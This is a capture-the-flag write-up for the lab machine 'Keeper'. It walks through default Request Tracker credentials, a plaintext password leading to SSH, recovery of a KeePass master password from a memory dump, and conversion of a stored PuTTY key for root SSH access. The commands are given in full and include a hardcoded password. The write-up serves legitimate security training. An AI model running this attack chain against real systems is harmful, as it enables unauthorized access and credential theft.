Keeper
Machine Information
Keeper is an easy-difficulty Linux machine that features a support ticketing system that uses default credentials. Enumerating the service, we are able to see clear text credentials that lead to SSH access. With SSH access, we can gain access to a KeePass database dump file, which we can leverage to retrieve the master password. With access to the Keepass database, we can access the root SSH keys, which are used to gain a privileged shell on the host.
Writeup
Enumeration
1
2
3
4
5
6
7
8
9
10
11
nmap -sCV -T5 10.129.229.41
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 35:39:d4:39:40:4b:1f:61:86:dd:7c:37:bb:4b:98:9e (ECDSA)
|_ 256 1a:e9:72:be:8b:b1:05:d5:ef:fe:dd:80:d8:ef:c0:66 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Go to website with port 80, resolve IP domain
1
echo "{IP} {domain}" | sudo tee -a /etc/hosts
Search for default credential of Request Tracker, and login in.
User Flag
Look at the top bar, we will see User > Select > click on that username, scroll down and we will see plain text password.
Connect to SSH and get the flag.
Root Flag
Download zip file from SSH using
1
sshpass -p 'Welcome2023!' scp -v lnorgaard@keeper.htb:/home/lnorgaard/RT30000.zip .
unzip file and we will see .dmp and `.kdbx’ files.
Search on Google Keepass dump vulnerablity poc and I got this POC
Run file and we got this
1
drgd med flde
Search it and we have
1
Rødgrød med fløde
Now crack .kdbx file using kpcli
1
kpcli --kdb passcodes.kdbx
Go to password/Networks, show -f 0 we will see the key. Copy all characters after Notes and delete all the begining spaces. Crack with
1
puttygen key -O private-openssh -o rsa
Connect to SSH with root and the key we just cracked.
1
ssh root@{IP} -i rsa